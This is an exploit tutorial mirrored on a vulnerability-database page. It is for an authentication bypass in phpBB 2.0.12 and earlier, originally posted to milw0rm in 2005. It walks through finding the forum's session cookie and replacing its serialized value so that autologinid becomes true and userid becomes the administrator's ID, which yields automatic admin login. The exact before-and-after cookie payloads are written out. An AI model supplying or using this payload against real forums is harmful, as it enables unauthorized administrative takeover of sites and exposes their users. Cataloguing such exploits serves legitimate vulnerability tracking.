Vulners
Lucene search
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)
1. Register at forum?
2. Log in with account
+ UNCHECK "Log in automatically"
3. Close browser to be sure a cookie is made.
4. Locate cookie
*firefox: X:\Documents and Settings\Name\Application
Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
--> search the .txt for the domainname (domain.tld)
--> default cookiename = phpbbmysql
*iexplorer: X:\Documents and Settings\Name\Cookies\[email protected]
--> default cookiename = phpbbmysql
Let's Xploit!
________________
Open the cookie in a text editor and search a line that resembles:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D
|
[ your 'user id' ] ____|
Replace this with:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
|
[ 2 = 'user id' of admin ] ____|
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Save cookie and close.
Open your browser and surf to forum.
You'll now be automatically logged in having admin right :)
# milw0rm.com [2005-03-05]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1